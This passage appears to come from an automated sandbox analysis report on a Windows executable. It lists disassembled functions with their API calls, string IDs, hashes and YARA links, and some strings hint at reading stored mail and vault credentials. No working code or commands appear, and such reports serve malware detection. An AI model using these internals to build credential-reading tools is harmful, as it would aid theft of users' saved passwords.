                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                                                                                                                                    Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040C28C
                                                                                                                                                                                    • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                                                                                                      • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FocusMessagePostmemset
                                                                                                                                                                                    • String ID: S_@$l
                                                                                                                                                                                    • API String ID: 3436799508-4018740455
                                                                                                                                                                                    • Opcode ID: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                                                                                                    • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                                                                                                    • Opcode Fuzzy Hash: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                                                                                                    Function 00407482 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscpy
                                                                                                                                                                                    • String ID: C^@$X$ini
                                                                                                                                                                                    • API String ID: 714388716-917056472
                                                                                                                                                                                    • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                                                    • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                                                                                                    • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                                                    • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                                                                                                    Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                                                      • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                                                    • String ID: MS Sans Serif
                                                                                                                                                                                    • API String ID: 3492281209-168460110
                                                                                                                                                                                    • Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                                                                                                    • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                                                                                                    • Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                                                                                                    • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                                                                                                    Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClassName_strcmpimemset
                                                                                                                                                                                    • String ID: edit
                                                                                                                                                                                    • API String ID: 275601554-2167791130
                                                                                                                                                                                    • Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                                                                                                    • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                                                                                                    • Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                                                                                                    • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                                                                                                    Function 0040759E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strlen$_mbscat
                                                                                                                                                                                    • String ID: 3CD
                                                                                                                                                                                    • API String ID: 3951308622-1938365332
                                                                                                                                                                                    • Opcode ID: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                                                                                                    • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                                                                                                    • Opcode Fuzzy Hash: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                                                                                                    Function 004326AD Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 475COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                    • String ID: rows deleted
                                                                                                                                                                                    • API String ID: 2221118986-571615504
                                                                                                                                                                                    • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                                                    • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                                                                                                                    • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                                                    • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                                                                                                                    Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$memset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1860491036-0
                                                                                                                                                                                    • Opcode ID: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                                                                                                    • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                                                                                                    • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                                                                                                    Function 00404888 Relevance: 6.3, APIs: 5, Instructions: 77COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004048C2
                                                                                                                                                                                    • memset.MSVCRT ref: 004048D6
                                                                                                                                                                                    • memset.MSVCRT ref: 004048EA
                                                                                                                                                                                    • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                    • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$memcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 368790112-0
                                                                                                                                                                                    • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                                                                                    • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                                                                                                                                                    • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                                                                                    • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                                                                                                                                                    Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D319
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$memcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 368790112-0
                                                                                                                                                                                    • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                                                    • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                                                                                                    • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                                                                                                    Function 0042C52C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                                                                                                    • too many SQL variables, xrefs: 0042C6FD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                    • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                    • API String ID: 2221118986-515162456
                                                                                                                                                                                    • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                                                    • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                                                                                                    • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                                                                                                    Function 00402624 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                                                                                                    • memset.MSVCRT ref: 004026AD
                                                                                                                                                                                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                      • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                      • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3503910906-0
                                                                                                                                                                                    • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                                                    • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                                                                                                                    • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                                                                                                                    Function 0040C8B8 Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040C922
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                                                                                                                    • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                                                                                                                    • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3798638045-0
                                                                                                                                                                                    • Opcode ID: 5260d67871d0b89722168e7d498f4e0a86ca69d9cc9d8627ca4b69d99b7a7acc
                                                                                                                                                                                    • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5260d67871d0b89722168e7d498f4e0a86ca69d9cc9d8627ca4b69d99b7a7acc
                                                                                                                                                                                    • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                                                                                                                                                    Function 0040B5E5 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 00409E0E
                                                                                                                                                                                      • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00409ED5
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040B60B
                                                                                                                                                                                    • atoi.MSVCRT(?,00000000,?,761F0A60,?,00000000), ref: 0040B619
                                                                                                                                                                                    • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                                                                                                    • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4107816708-0
                                                                                                                                                                                    • Opcode ID: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                                                                                                    • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                                                                                                    Function 00444462 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strlen
                                                                                                                                                                                    • String ID: >$>$>
                                                                                                                                                                                    • API String ID: 39653677-3911187716
                                                                                                                                                                                    • Opcode ID: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                                                                                                    • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                                                                                                    • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                                                                                                    Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                    • API String ID: 3510742995-2766056989
                                                                                                                                                                                    • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                                                    • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                                                                                                    Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strcmpi
                                                                                                                                                                                    • String ID: C@$mail.identity
                                                                                                                                                                                    • API String ID: 1439213657-721921413
                                                                                                                                                                                    • Opcode ID: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                                                                                                    • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                                                                                                    • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                                                                                                    Function 00406620 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00406640
                                                                                                                                                                                      • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                                                                                      • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                      • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                    • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memset$memcmp
                                                                                                                                                                                    • String ID: Ul@
                                                                                                                                                                                    • API String ID: 270934217-715280498
                                                                                                                                                                                    • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                                                    • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                                                                                                    • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                                                                                                    Function 0040B903 Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
